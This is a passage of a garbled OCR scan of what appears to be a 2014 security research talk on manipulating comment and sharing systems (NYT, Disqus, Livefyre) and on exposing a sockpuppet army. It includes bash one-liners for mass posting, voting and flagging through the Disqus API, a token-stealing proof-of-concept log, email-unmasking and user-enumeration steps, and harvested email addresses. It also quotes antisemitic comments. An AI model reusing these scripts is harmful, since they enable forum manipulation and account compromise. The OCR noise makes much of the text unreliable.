Obama's Top Military Adviser 
Warns of Possible ISIS Attacks in 
Baghdad 

Campaigns Find Ad Space Finite, 
Even on the Web 

Transcripts Kept Secret for 60 
Years Bolster Defense of 
Oppenheimer's Loyalty 
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Canoellation of High 
School Football Season 
Leads SayreviUe to Ask 
What Happens Next 



7th Sayreville Football Player 
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Hazing Case 

To Become a Doctor 
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Bits Blog: Amazon and Its Missing 
Books 

Power Up: Inside League of 
Legends^ E-Sports's Main Event 




Sports 

Broncos 31^ Jets 17: 
Encouraging Showing 
by Jets Still Ends in 
Loss to Broncos 



Travis Ishikawa Sparks San 
Frandsoo Giants and Revives 
Sagging Career 

Giants 3, Cardinals 0: Giants 
Torment Adam Wainwright as 
Cardinals Struggle to Hit in 
Opener 



Obituaries » 

Carolyn Kizer, Pulitzer- 
Winning Poet, Dies at 

ae 

Ray IC Metzker, Art 
Photographer, Dies at 83 



Siegfried Lenz, Novelist of 
Germany's Past, Dies at 88 
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Arts » 

Music Review: 
BomPlenazo Artists 
Collective at Hostos 
Community College 



'Gone Girl' Shakes Off Box Office 
Cobwebs 

Dance Review: Luanda Childs 
and Alvin Ailey Troupe at Fall for 
Dance 
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'Gone Girl' Shakes Off 
Box OfRce Cobwebs 




In 'Birdman/ Michael 
Keaton Confronts the Nature of 
Fame 



Justin Simien Goes Mainstream 
With 'Dear White People' 



Theater » 

Theater Review: 
IMarjorie Prime/ a 
Tender Comedy 
Starring Lois Smith 
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• Search for Homes for Sale or Rent 

• Sell Your Home 
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MOST EMAILED 



P^T VIEWED 



1. Is E-Reading to Your Toddler Story Time, or 
Simply Screen Time? 



2 OPINION 

Can Celiac Disease Affect the Brain? 



3 No Smoke, No Mirrors: The Dutch Pension 
' Plan 



4. Heavier Babies Do Better in School 



5. What Happens When Second Graders Are 
Treated to a Seven-Course, $220 Tasting 
Meal 

6. At Forfom Urban Churches, Mass Gets 
Crowded in a Flash 



7. Before the Advice, Check Out the Adviser 



8. A Promising Pill, Not So Hard to Swallow 



g MAUREEN DOWD 

Lady Psychopaths Welcome 





1 0 NICHOLAS KRISTOF 




but we need an account on the 

site to share the article 



th nkst 

app ied research 



At the time of writing, we have 
at least 30 000 accounts 



** NYT Admins - Sorry! 
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15. OP-ED CONTRIBUTOR 

An Adirondack Wilderness Imperiled 

By EOWARO ZAHNISER 

A plan set in motion by Gov. Andrew Cuomo would allow an open pit mine in forest 
preserve land. 

OotoArticte I Emai 

16. Making Quinoa and Rice Bowls 

Jonr-y WcxxJwa'd 

Melissa Clark assembles a iieart) meal with quinoa, kale, kimdu, egg and a simple 
dressing. 

Go to Artide 1 Emal 
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YOUR MONEY 

Beware of Shifting Options Within Medicare Plans 

By TARA SIEGEL B H N A l: 

Open enrollment for Medicare starts Oct. 15, and offers older Americaiu a dizzying array 
of health care options. 

Go to Articie Emal 



18. MUSIC REVIEW 

Swept Up in Bach's All-Consuming Passion 

By ANTHONY TOMMASINI 

The Berlin Philharmonic's performance of "St. Matthew Passion" at the Park Avenue 
Armor\-, conducted by Simon Rattle, showed why Bach chose other ways besides opera to 
tell stories through music. 

Go to Artide I Emal 

19. A Twist Adds Complexity to a Pasta Dish 

By MARK BITTMAN 

Mark Bittman's take on a great pasta dish for the fall, pasta alia Norma. 
Go to Artide I Emal 



20. Restaurant Cocktails That Aim Too High 

By PETE WELLS 

New restaurants in New York City are offering cocktail lists that are becoming more 
creative, and not in a good way. 

Go to Artk:te 1 Emal 
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Go to Article | Sign In to EmaM 



13. In the U.S., a Turning Point in the Flow of Oil 

By CLIFFORD KRAUSS 

Thanks to new techniques, an oil bounty is Ukely to make the United States a major 
eaqiorter of oil again. Not eveiyone is cheering. 

GotoArticis | Sign In to Email 



14. Cave Paintings in Indonesia May Be Among the Oldest Known 

By JOHN NOBLE WILFORO 

The paintings of hands and animals in se\'en Umestone ca>'es on Sulawesi had previously 
been dismissed as no more than 10,000 >'ears old. 

Go to Article | Sign In to EmaH 



15. RESTAURANT REVIEW I HUERTAS 

A Serendipitous Trip to Spain 

By PETE WELLS 

Huertas, a garlk-infused ode to the Basque CountT>', beckons in the East Village. 
Go to Article < Sign In to EmaH 




16. OP-ED I THOMAS B. EOSALL 

The State-by-state Revival of the Right 

By THOMAS 8. EDSALL 

The conservative revolution has been thriving outside of Washington. \\ hat does that 
mean for the future of the Republican Party? 

Go to Article I Sign In to Entail 
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An Adirondack Wilderness Imperiled 

By EDWARD ZAHNISER 

A plan set in motion by Gov. Andrew Cuomo would allow an open pit mine in forest 
preserve land. 

GotoArlicte I Sign In to EmaH 



I 



18. MUSIC REVIEW 

Swept Up in Bach's All-Consuming Passion 

By ANTHONY TOMMASiNI 

The Berlin Philharmonic s performance of "St. Matthew Passion" at the Park Avenue 
Armor\ % conducted by Simon Rattle, showed why Bach chose other ways besides opera to 
tell stories through music 

Go to Article Sign In to Email 
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Cost to register 30k accounts: 



$0.12 
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Cost to share 30k stories: 



$0.12 
$0.18 
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Cost to register 30k accounts: $ 0.1 2 

Cost to share 30k stories: $ 0.1 8 

Trivially manipulate the NYT front page: Priceless 
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• Disqus let's you drop a few lines of .js in your page 
which magically gives you an entire commenting 
system. 

• Comments can be voted up/down which affects order. 

• User profiles are visible across sites and your 
comments are gathered in your Disqus profile page. 

• Admins get a nifty interface to moderate and maintain 
their comment threads. 



Used by Wordpress blogs, 
Tumblrs, soccer mom forums 
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and CNN, Al Jazeera, Bloomberg, 
The Next Web, NPR, The Atlantic, 
IGN, The Daily Telegraph etc 
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They don't control the ful 

message 
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• Login: left as an exercise for the reader 

• Mass post: 

export thread="threadid";export msg="mymessage"; (for i in 
seq -f "userprefix%g" 1 100 ;do eclio "curl -b \"${i}.cookies\" 
-d \"thread=${thread}&message=${msg}&api_key=${API_KEY} 
\" http://disqus.com/api/3.0/posts/create.json";done;)|parallel 

• Mass vote: 

export post="postid";export vote="1 "; (for i in seq -f 
"userprefix%g" 1 100 ;do echo "curl -b \"${i}.cookies\" -d 
V'post=${post}&vote=${vote}&api_key=${API_KEY}\" httpi// 
disqus.com/api/3.0/posts/vote.json":done :)|parallel 



• Mass downvote 



export post="postid";export vote="-1 "; (for i in seq -f 
"userprefix%g" 1 100 ;do echo "curl -b \"${i}.cookies\" -d 
\"post=${post}&vote=${vote}&api_key=${API_KEY}\" 
http://disqus.com/api/3.0/posts/vote.json ":done:) 
parallel 

• Bonus: Flag posts to temporarily make them disappear 

export post="postid"; (for i in seq -f "userprefix%g" 1 
1 00 ;do echo "curl -b \"${i}.cookies\" -d \"post=${post} 
&api_key=${API_KEY}\" http://disqus.eom/api/3.0/posts/ 
report.json ":done:)|parallel 
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Pretty much complete control of 

Disqus forums 
(with 1 line of bash script) 
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Wut? 
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User registration isn't IP-limited that we've 
encountered 



Email verification isn't a requirement 




Guest voting _is_ IP-limited 



Open proxy lists bypass this trivially 
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ALL OF THE SAME ATTACKS 
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^ C D www.foxnews.com/us/2014/ 10/15/losing-war-on-coal-one-virginia-town-painful-decline/# 
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Ainsley Earhardt test drives a 
Ferrari 



Ferrari goes from zero to sixty 



Teens who ran away from home 
to join ISIS want to come home 



PSObama 



423 people listening 



-I- Follow 



<^ Share 



Post comment 



Newest Oldest Hot Threads 




PSObama 

Thanks Obama! Edit (in e minutes) 



just now 



W Delete <sf Share 



Like 



Reply 



boiseboy12 11 minutes ago 

I recommend you read Jeremy Rifkins book "The Third Industrial 
Revolution" about how the Europeans are addressing their energy 
needs, and how it is producing not just power, but a lateral society. 

IBM has created a computer system that coordinates individually 
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Flag as spam 4/5 times to remove 
(try it yourself on fox news :) 
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ivefyre: one more thing.. 
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W T tennis.com -Federe. 

Kt 
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There imglit stiil be some adjustments to my schedule moving torward, I defuiitely 
need to play well for that to happen. If I don't play well, I guess I can also play 
ev^erything/' he said. 

Federer could reach No. 2 mth a good pei lui niaiiLL in bnan^ai. 



Expand 
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Edit profile 
Sign out 
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(S> [u| + Follow 


C; Share ▼ 


Post comment 



Newest | Oldest | Top Comments 



Dan Last i 
I pretty much doubt that he will skip basel or paris if he does well in Shanghai and could gain 
points on ISiovak. If he has a chance to end year end No. 1 he will play as much as he can. 



This would be his ultimate achievement, to get back that year end Mo 1 and he is close, 
considering that Novak may take some time off due to his private situation. 



If Novak wins Shanghai he probably will end up No 1 as his lead over Fed would be at least 
2,000 pts with only about 3,000 pts up for grap for the rest of the season. 



Rafa pretty much has no more charKe to end as year end No 1. He would have to win 
everything and hope Novak does not bag more than 1000 points in the 4 events. Given Nadal's 
injury, form and also past history at indoor events I just dont see that. He never won London but 
would have to win all 5 matches at London to get the 1,500 pts needed. 



<pand 

I TENNIS.com 

I @Tennis 

Ferrer tumbles Nir^-ikori improves standing 

I race for @^ Tour Finals. Read: 

.tennis.con" 
c.twrtter.cor ; ^ . . , 



<panG 

lTENNIS.com 

ig'Tennis 

3ger returns to the tour in Shanghai. 
|SteveTrgnor breaks down the draw in 

2k in Preview: 
lnni5.com/pro-game/2014/... 
lc.twitter.com/Jy8vZL 
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livefyreA 



5 people listening 



<1 Share ▼ Post comment 
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Like Reply 
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2 comments 



^ normaluser4 



+ Follow 



Newest | Oldest | Top Comments 



L 



epsilOn I 

test Edit 

Latest blog post: Scr New 



epsilOn 
efef Edit 



moderator 



Latest blog post: New collection 



iv)user@ubuntu:~/llvefyre$ python poc-tokensteal.py 
Running on http://127. 0.0*1:5000/ 
Restarting with reloader 

\0.0.1 - - [07/0ct/2014 01:18:36] "GET / HTTP/1.1" 200 - 
\6.0*1 - - [07/0ct/2014 01:18:42] "GET /scrlpt.js HTTP/1.1" 200 - 
\0.6.1 - - [07/0ct/2014 01:18:42] "GET /favlcon.lco HTTP/1.1" 404 - 
\0.0.1 - - [07/0ct/2014 01:18:42] "GET /favlcon.lco HTTP/1.1" 404 - 

Got token (eyJhb. . ) 

Posted comment (ok) 

.0.0.1 - - [07/0ct/2014 01:19:03] "GET /If token/eyJhbGclOlAlSFMyNTYlLCAldHlwI jogIkpXVCJ9.eyJkb21haW4i 
00TgsIC31c2VyX2lkI jogIl91cDY2NDY30DUyIn0.CwvDr6oXnzld0P8rch4- jzfU4jqR2VNVdzsLbkopAD0?r=elwslnel3lw HT 



"GET /lftoken/ey:hbGclOlAlSFM 



what Catalan! 



%^ www.newfepublic.corr 



6 comments 



Sign in 



12 people I'^rening 



<!, ohare " Post comment as. 



iioni]aluser4 



"We are told about the world before we see it. We imagine most things before we 
experience them. And those preconceptions, unless education has made us acutely aware, 
govern deeply the whole process of perception." Walter Lippmann, Public Opinion 
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4chan polls 
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httD://venturebeat.com/2012/06/22/reddit-fake-users/ 



I Palestine in Chile 

HamBaconEggs * 7 months ago 

"The jew cries out in pain as he strikes you." -Polish proverb 




wgenrgenr@gmail.com 



DeShawn S. 


Williams 




Pro-Whtte/Black, anti-Jew 


. 4 




Join Date: Mar 2009 


Location: il 




Posts: 1,468 







I Palestine in Chile 

HamBaconEggs • 7 months ago ergengekr@gmail.com 

If you don't like what you see here, Shiomo, then go hide in your synagogue and study Talmud s 
day Progressives, among others, are sick and tired of Zionist jews committing heinous crimes a 
then using their disproportionate financial and media control to justify or underwrite them. The o 
of "anti-Semitism" is just a way to shut up those who call you out on your tactics. Time to stop 
acting as though you're better than the "goyim." You're no better than anyone else; indeed, a 
majority of your tribe have proven themselves far worse. 



HamBaconEggs ^ Guest • 10 months ago 

Just Imagine how many millions of people would have been saved from the scourge 
of Judeo-imperialist wars and Jewish financial predations had Hitler actually finished | 
the job. 

4 >✓ . Share » 






httD://wwwxommondreams.ora/hambaconeaas-screen-names. 
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Remember: 

We discovered that flagging 
posts got tliem killed? 
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IDF 

Saturday at 12:10 PM • <i 



Please help us by marking any antisemitic 
and anti Israeli comments as spam! 

434 Likes 86 Comments 



tk Like 




Comment 



^ Share 





IDF 

July 7 at 2:04 PM • « 



Will you help? 



JTRIG 



httD://en.wikiDedia.ora/wiki/Joint Threat Research Intelliaence Grou 
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Two broad categories 



nee or disruption* 



on 



Known in GCHQ as nUne overt 
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applied research 



THE//INTERCEPT 



FEATURES GREENWALD FROOMKIN DOCUMENTS STAFF CONTACT // 



DOCUMENT 



PAGES 



Zoom 



I I I K I 



Swamp Is a tool that will silently locate all predefined types of file and encrypt them on a targets 

donkey machine. 



TORNADO is a delryrery method (Excel Spreadsheet) that can silentty extract and run an executable 
ALLEY on a target's machine 



UNDERPASS Change outcome of online polls (previously known as NUBILO) 



n m r iauons 

Ready to fire (but 
see target 
restiictions) 

Ready to fire (but 
see target 
restiictions) 



J- . .ad Section 
In demlopment. X, Expert User 




VIPERS 
TONGUE 



Ready to fire (but 



is a tool that will silently Denial of Senrice calls on a Satellite Phone or a GSM Phone see target 

restnctions) 




jTRiG osoai 



WARPATH Mass delivery of SMS messages to support an Information Operations campaign 



Ready to fire 



[edit] Work Flow Management 



UNDERPASS Change outcome of online polls (previously known as NUBILO) 



In deivelopment 



Disqus seems ripe for the picking. 
So we went looking active armies. 
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Most commented thread on 
CNN's highest voted comment 



46324 Comments 



CNN 



Q clickerl ▼ 



Sort by Best ▼ 



Share Favorite if 




Mimi Satterlee 3 months ago 

I I wish you a speedy and full recovery from your condition. 



Thanks Son. 

665 ^ Share > 



Most commented thread on 



46324 Comments CNN 




II recover 



665 ^ ' ^^ • Share > 



Approach 
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•J 

Pick sliglitly controversial topic: 
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Pick news orgs that cover this 

topic 
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Then 



• Use Disqus API to get a list of popular stories 

• For each story, use the API to pull user info 

• Link users to stories they commented on 

• and... 



SETEC REAL WOOF CRETS 
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Cue a bunch of similar 
attempts to look at the data 
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Decided to focus on voting 
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Pull all comments for random story. 
For each comment pull the non-guest voters. 
For each voter retrieve their registration time. 



Calculate the variation in voter age on each comment 



1800 



Voter Age •Variation 

««• 




.2 900 



450 



3^ 



• •• 



• • • • * • 

••• •• •• • 
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200 

Comment 



300 



400 



Voter Age* Variation 




What stood out 



• Accounts had been registered within minutes of each 
other. 

• Their usernames and profile names had a regular 
pattern: 

• Username: <Firstname><Surname> 

• Profile name: <Firstname> <Surname> 



Cvenv)abbot:maltego marco$ python unmask. py -v 2919407889 1540287681 like 
Disqus Unmasker 
marco§>thinkst . com 



[*] Looking up comment 1540287681 

[*] Looking up voters on comment 1540287681 

NatalyoMcalpin - Natalya Mcalpin C109616253) 2014-06-05117:46:08 117d 
NerissaNiel - Nerissa Niel (109616261) 2014-06-05117:46:13 117d 
OdessaOgilvie - Odessa Ogilvie (109616307) 2014-06-05117:46:32 117d 
PaigeSwanger - Paige Swanger (109616327) 2014-06-05117:46:42 117d 
PaulinaPrivett - Paulina Privett (10%16340) 2014-06-05117:46:48 117d 
RandaBallance - Randa Ballance (109616381) 2014-06-05117:47:07 117d 
RodgerRansom - Rodger Ransom (109616473) 2014-06-05117:47:41 117d 
RogerReddix - Roger Reddix (109616481) 2014-06-05117:47:46 117d 
SorayaPiotrowski - Soraya Piotrowski (109616699) 2014-06-05117:49:34 117d 
TeriClerk - Teri Clerk (109616781) 2014-06-05117:50:07 117d 
TerinaTurrell - Terina Turrell (109616790) 2014-06-05117:50:13 117d 
ThaoMcanulty - Thao Mcanulty (109616811) 2014-06-05117:50:22 117d 
TyrellTennyson - Tyrell Tennyson (109616851) 2014-06-05117:50:40 117d 
VertieValliere - Valliere (109616881) 2014-06-05117:50:54 117d 



disqus_0xkykFPm7E - TheTruth (117719302) 2014-08-11700:45:34 50d 



Guests Likes: 23 
(venv)abbot:maltego marco$ | 



^ Meanwhile. ISIS racists and kidnappers are admired followers of ISIS's 




1 




Rodger Ransom 



Rosette Richards 





Russell Dipaolo 



Theodora Tippin 



5 days ago 

ed for Haditha massacre, Although US is 
. only because right wing there does not 
3r wise they would be worse than IS. World 
he still not forgotten Hitler. 

4 ^ ^ ' Reply • Share > 



Not exactly convincing 



hth'nkst 
app led research 



What about their emails 

addresses? 

(Hint: you really shouldn't be able to retrieve a Disqus 

user's email address) 



th nkst 

app ied research 



We found an unmask attack that 
returns an email address for a 

profile name* 



*Already reported and fixed 



th nkst 

app ied research 



Supposed puppets had emails 



in tlie form: 
<Firstname><Surname> 



mai .com 



th nkst 

app ied research 



We had our suspicions, but thouglit 
tine puppet army wouid be iarger. 

Time to enumerate. 



th nkst 

app ied research 



User Enumeration 



Disqus users get a unique ID 



This ID is a counter (yay!) 



There are unrestricted APIs to query user information (yay! yay!) 

• https://disqus.eom/api/3.0/users/details.json 

We can lookup email addresses for each enumerated user with our 
unmask attack (yay! yay! yay!) 

So we pick a lower and upper bound beyond the lowest and highest 
known puppet IDs, making a range of 5k users. 



• Pull details for all users. 



5k users. Now what? 



Filter on known values: 





Must have username, name and email patterns, and 
not be verified. 



• Age is already taken into account with the ID, so less 
relevant. 



marco@playpen :~$ 
7.09K 109614«27 ; 
7.44X 109614«4e ; 
7.71X 109614850 : 
7.90K 109614«57 ; 
8.17X 109614867 ; 
8.49K 109614879 : 
8.85X 109614892 : 
9.12X 109614902 : 
9.47» 109614915 ; 
9.74X 109614925 : 
10.06K 109614937 
10.22X 109614943 
10.49% 109614953 
10.79% 109614964 
11.06% 109614974 
11.36% 109614985 
11.63% 109614995 
11.85% 109615003 
12.01% 109615009 
12.33% 109615021 
12.58% 109615030 
12.82% 109615039 
13.20% 109615053 
13.52% 109615065 
13.90% 109615079 
14.25% 109615092 
14.66% 109615107 



grep gmail. com users-109614253-109618253.txt I grep ' .*([A-Z][A-Za-z]\+).*' I 
AlainaDartezf^nail.cGiii CAlainaDartez) 117 2014-06-05717:35:45 
AlecioAxleyegmail.com (AlecioAxley) 117 2014-06-05117:35:49 
AleshciHepner@gniail.cGiii CAleshoHepner) 117 2014-06-05717:35:54 
AllynAlfreyegmail.com (AllynAlfrey) 117 2014-06-05717:35:58 
AlinciAniwoocl@gmail.coin (AlmoAmMood) 117 2014-06-05717:36:03 
AlvinNolanegmail.com CAlvinNolan) 117 2014-06-05717:36:07 
AniacloGomianegmail.com CAmadoGorman) 117 2014-06-05717:36:12 
AngelinaCresp0@9nail.com CAngelinaCrespo) 117 2014-06-05717:36:17 
AngelynAlenian@gniail.com (AngelynAleman) 117 2014-06-05717:36:22 
AntoinetteAlcom@^il.com (AntoinetteAlcom) 117 2014-06-05717:36:27 
: ArdenApril@gmail.com (ArdenApril) 117 2014-06-05717:36:32 
: BeatrizBuchholtz@gmail.com (BeotrizBuchholtz) 117 2014-06-05717:36:37 
: BelvaSeckman@gmail.com (BelvaSeckman) 117 2014-06-05717:36:42 
: BriceBosket@gmail.com CBriceBosket) 117 2014-06-05717:36:46 
: Br00kePlate@9nail.com CBrookePlate) 117 2014-06-05717:36:50 
: BryannaCallanan@gniail.com (BryannaCallanan) 117 2014-06-05717:36:55 
: CamianConian@gniail.com CCarmanComan) 117 2014-06-05717:36:59 
: CatarinaCountrynian@gniail.com (CatarinaCountryman) 117 2014-06-05717:37:04 
: CherelleCostner@gmail.com (CherelleCostner) 117 2014-06-05717:37:08 
: ChKsteenChien@gmail.ccm CChristeenChien) 117 2014-06-05717:37:13 
: ChrtstelDecola@gmail.com CChristelDecola) 117 2014-06-05717:37:17 
: ChrystalCryan@gmail.com (ChrystalCryan) 117 2014-06-05717:37:22 
: CicelyCorreliegmail.com (CicelyCorrell) 117 2014-06-05717:37:26 
: ClarineChcivarriciegniail.com CClarineChavarria) 117 2014-06-05717:37:32 
: ClarineHeerenegniail.com CClarineHeeren) 117 2014-06-05717:37:37 
: aetaEvans@gmail.com (QetaEvans) 117 2014-06-05717:37:42 
: ConnieCola@gmail.com (ConnieCola) 117 2014-06-05717:37:48 



49% 109614953 : BelvaSeckinan@gmail.com CBelvaSe< 

79K 109614964 : BriceBosket@gmail.com (BriceBosI 

06X 109614974 : BrookePlate@gmail.com CBrookePl< 

36K 109614985 : BryannaCallanari@gmail.com (Bryai 

63X 109614995 : CarmanComan@gmail.com (CarmanCoi 

85X 109615003 : CatarinaCountryman@gmail.com CC< 

01% 109615009 : CherelleCostner@gmail.com CCher( 

33% 109615021 : ChristeenChien@gmail.com CChrisi 

58X 109615030 : ChristelDecola@gmail.com (Christ 

82X 109615039 : ChrystalCryan@gmail.com (Chryst< 

20K 109615053 : CicelyCorrell@gmail.com (Cicely^ 

52X 109615065 : ClarineChavarria@gmail.com (Qai 

90K 109615079 : QarineHeeren@gmail.com (Clarin^ 

25X 109615092 : QetaEvans@gmail.com CQetaEvan< 

fVnik 1 M^l "^l A7 * Cnnni pToI rAnmni 1 rnm f Cnnni t^nl i 



Inter-registration time 
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Registration number 



Inter-registration time 
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SoF 



Accounts with 



Patterned profile names 



Patterned usernames 



Patterned emails 



Similar registration times 



Regular inter-registration delays 




Alphabetical progression in usernames 



Disqus lets us map usernames 
to forums where they're active 



th nkst 

app ied research 




Dfsqus Usemame □ Dfsqus Fomm Mame 



Disqus also lets us map 
usernames to comments* 



*lncluding "Private" profiles 



th nkst 

app ied research 








TeraTaveras OnitaStrahan TheolaBach RodgerRansom YajairaSaia 





PaulinaPrivett 




<p>There no hasbaRats defending the indefensible 1 



th nkst 

app ied research 



So 



• Accounts with 

• Patterned profile names 

• Patterned usernames 

• Patterned emails 

• Similar registration times 

• Regular inter-registration 
delays 

• Alphabetical progression in 
usernames 



• And 

• Active on the same set of 
sites 

• Shared duplicate 
comments across accounts 

• Vote for each other's 
comments to push them up 



a 



Puppet army size 



Period of activity 



Comments posted 



Unique comments 



Primary targeted forums 



1 86 confirmed 



Four months (2014-06-5) 



7269 



5782 (1487 dups) 

CNN, Al Jazeera, 
Jerusalem Post 



hth'nkst 
app ied research 



What are they saying? 



hth'nkst 
app ied research 



Consistent mu It i -faceted views 



• Pro- Palestine 

• Anti-Israel 

• Anti-ISIS/L 

• Writes "We (USA)", presents as Western 

• Anti-Syria 

• Anti-Obama 

• Pro-Islam (Writes "I am Christian and I know tliat Christianity is worst 
religion in the world" :) 



So who is this? 



hth'nkst 
app ied research 



No idea. Anything is pure 

speculation. 



hth'nkst 
app ied research 



Ways out? 



hth'nkst 
app ied research 



Shut down this puppet army 



hth'nkst 
app ied research 



C □ https://mail.google.eom/mail/#lnbox 



Google 



Gmail 



COMPOSE 



Inbox (1) 

Starred 
Sent Mail 
Drafts 
Mofe^ 



Soraya 



Q Primary 



□ ^ Disqus Digests 
n Disqus 

□ password (2) 




sorayapiotrowski@gmail .c. . . 



1-3 of 3 < > 



Top conversations on Al Jazeera English - Disqus Settings Explore other aw 

Re: New comment posted on ISIL under heavy assault by Kurds in Iraq - Disqus 
Disqus Password Reset Confirmation - Hi SorayaPiotrowski, You have recently 




Oct2 

Oct1 
Oct1 





^ O https://disqus.com/home/inbox 






t:? @ = 


DISQUS A 


t© 




• • • 

• • • 

• • • 


Notifications 0 




All 


^ Replies 



Pending 



^ Aboubakr and 4 others upvoted you on ISIL under heavy assault by Kurds in Iraq a day ago 

Soraya Piotrowski • 2 days ago 
Congratulations 0 muslims on the advent of the auspicious occasion of Eid (Saturday) as well as the. 



Bruisse upvoted you on Arabs In Israel decry racial discrimination • 2 days ago 



Disqus limiting their API. 
(This would be a bad idea.) 



th nkst 

app ied research 



• Puppetry is very likely happening in other 
places. 

• But without the same amount of data, we 
can't tell. 

• Disqus' open data approach is great for 
identifying these relationships and patterns, 
and we want to give them shouts for it. 

• (But fix the unmask attacks.) 



Summary 



? 



hth'nkst 
app ied research 



Slide 223/225 




th nkst 

app ied research 



• Without exception, all of the UGC sites 
we have looked at have proven to be fairly| 
trivial to manipulate 

■i 

• It is clear that this abuse is already taking 
place on many of them 

i 

! 
! 

• Be aware of it; I 

! 
1 

• Build tools to help deal with it; 




thinkst 

applied research 



{azhar|nnarco|haroon}@ thinkst.conn 

research@thinkst.conn 



